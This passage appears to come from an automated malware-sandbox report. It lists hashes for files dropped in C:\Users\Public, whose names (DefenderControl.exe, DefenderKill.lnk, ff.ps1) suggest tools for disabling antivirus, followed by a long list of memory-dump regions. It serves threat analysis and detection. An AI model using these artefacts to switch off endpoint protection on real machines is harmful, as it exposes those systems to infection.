de94f9f41e74c9b52265ab3d79c20df89ec946a9ab56ac5dcc3b5d5bca7bec5ac8eae506b3da6c592daeae6d3569e78c678bd52739e493f5490a65372157c0c1

Download Submit
C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderControl.exe
MD5
139464919440e93e49c80cc890b90585

SHA1
0237408cdb74ad6b8d340cdf0d03c1b1f820ce17

SHA256
ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4

SHA512
d6993d7568f6b39bf2ba0c0988eb30b9506dc05d50aef693d22a64c34e0d5cd5bdb32a828b666c9c37f116deba63b10ce662b9e42ad1025a7b05eb0b32251a1c

Download Submit
C:\Users\Public\DefenderKill.lnk
MD5
429eeaa2203c3a2e0f214283715ae07e

SHA1
d63147618c6e92d5f38dc8816b633049f004c729

SHA256
d1394f2f94909d3351b663b93c5eb6ca902d3f9f21f528adf1fd86eeba8f819c

SHA512
a39e4f97f490e4255fd2356b7543e59771b1df98b502031b601d9125719c52e2af46a845e5627b27c0c5aa0e8587ab193dca4cf03d7c392eeb99a74c7257b76d

Download Submit
C:\Users\Public\ff.ps1
MD5
76689eadd2c4317ec7d2f5abe74df2ba

SHA1
99ca8d374b94518ccf47fd4ec4aa202059ad254d

SHA256
35c900caf65e96d12977782e9299b8d851e61ae9d0d6505f1a3a9c23cf0e79f0

SHA512
315770b7e176a5c217ae59ee26f2bfa7b9bd79138501a5be36b48cad2453a998a6fc4d89c9bae9250348a777416d691a6d3f777dffe6e745e3bf4d402e9cd97e

Download Submit
memory/184-156-0x0000000006872000-0x0000000006873000-memory.dmp

Filesize
4KB

Download
memory/184-171-0x0000000006873000-0x0000000006874000-memory.dmp

Filesize
4KB

Download
memory/184-155-0x0000000006870000-0x0000000006871000-memory.dmp

Filesize
4KB

Download
memory/184-141-0x0000000000000000-mapping.dmp

Download
memory/1348-117-0x0000000000000000-mapping.dmp

Download
memory/1824-129-0x0000000005332000-0x0000000005333000-memory.dmp

Filesize
4KB

Download
memory/1824-125-0x0000000008270000-0x0000000008271000-memory.dmp

Filesize
4KB

Download
memory/1824-139-0x0000000005333000-0x0000000005334000-memory.dmp

Filesize
4KB

Download
memory/1824-132-0x0000000008AA0000-0x0000000008AA1000-memory.dmp

Filesize
4KB

Download
memory/1824-131-0x00000000088A0000-0x00000000088A1000-memory.dmp

Filesize
4KB

Download
memory/1824-130-0x0000000008650000-0x0000000008651000-memory.dmp

Filesize
4KB

Download
memory/1824-137-0x000000000A1F0000-0x000000000A1F1000-memory.dmp

Filesize
4KB

Download
memory/1824-128-0x0000000005330000-0x0000000005331000-memory.dmp

Filesize
4KB

Download
memory/1824-138-0x0000000009790000-0x0000000009791000-memory.dmp

Filesize
4KB

Download
memory/1824-119-0x0000000000000000-mapping.dmp

Download
memory/1824-127-0x00000000082E0000-0x00000000082E1000-memory.dmp

Filesize
4KB

Download
memory/1824-122-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/1824-123-0x00000000079F0000-0x00000000079F1000-memory.dmp

Filesize
4KB

Download
memory/1824-124-0x00000000078C0000-0x00000000078C1000-memory.dmp

Filesize
4KB

Download
memory/1824-126-0x0000000008090000-0x0000000008091000-memory.dmp

Filesize
4KB

Download
memory/1920-229-0x0000000000000000-mapping.dmp

Download
memory/1932-223-0x0000000000000000-mapping.dmp

Download
memory/2008-221-0x0000000000000000-mapping.dmp

Download
memory/2024-225-0x0000000000000000-mapping.dmp

Download
memory/2336-208-0x0000000001253000-0x0000000001254000-memory.dmp

Filesize
4KB

Download
memory/2336-206-0x0000000001252000-0x0000000001253000-memory.dmp

Filesize
4KB

Download
memory/2336-205-0x0000000001250000-0x0000000001251000-memory.dmp

Filesize
4KB

Download
memory/2336-202-0x0000000000000000-mapping.dmp

Download
memory/2356-216-0x0000000000DA3000-0x0000000000DA4000-memory.dmp

Filesize
4KB

Download
memory/2356-209-0x0000000000DA0000-0x0000000000DA1000-memory.dmp

Filesize
4KB

Download
memory/2356-217-0x0000000000DA4000-0x0000000000DA6000-memory.dmp

Filesize
8KB

Download
memory/2356-207-0x0000000000000000-mapping.dmp

Download
memory/2356-210-0x0000000000DA2000-0x0000000000DA3000-memory.dmp

Filesize
4KB

Download
memory/2372-215-0x0000000000000000-mapping.dmp

Download
memory/2448-200-0x0000000004AE2000-0x0000000004AE3000-memory.dmp

Filesize
4KB

Download
memory/2448-204-0x0000000004AE3000-0x0000000004AE4000-memory.dmp

Filesize
4KB

Download
memory/2448-198-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

Filesize
4KB

Download
memory/2448-187-0x0000000000000000-mapping.dmp

Download
memory/3168-197-0x00000000011F3000-0x00000000011F4000-memory.dmp

Filesize
4KB

Download
memory/3168-175-0x00000000011F2000-0x00000000011F3000-memory.dmp

Filesize
4KB

Download
memory/3168-173-0x00000000011F0000-0x00000000011F1000-memory.dmp

Filesize
4KB

Download
memory/3168-164-0x0000000000000000-mapping.dmp

Download
memory/3228-218-0x0000000000000000-mapping.dmp

Download
memory/3616-231-0x0000000000000000-mapping.dmp

Download
memory/3996-114-0x0000000000000000-mapping.dmp

Download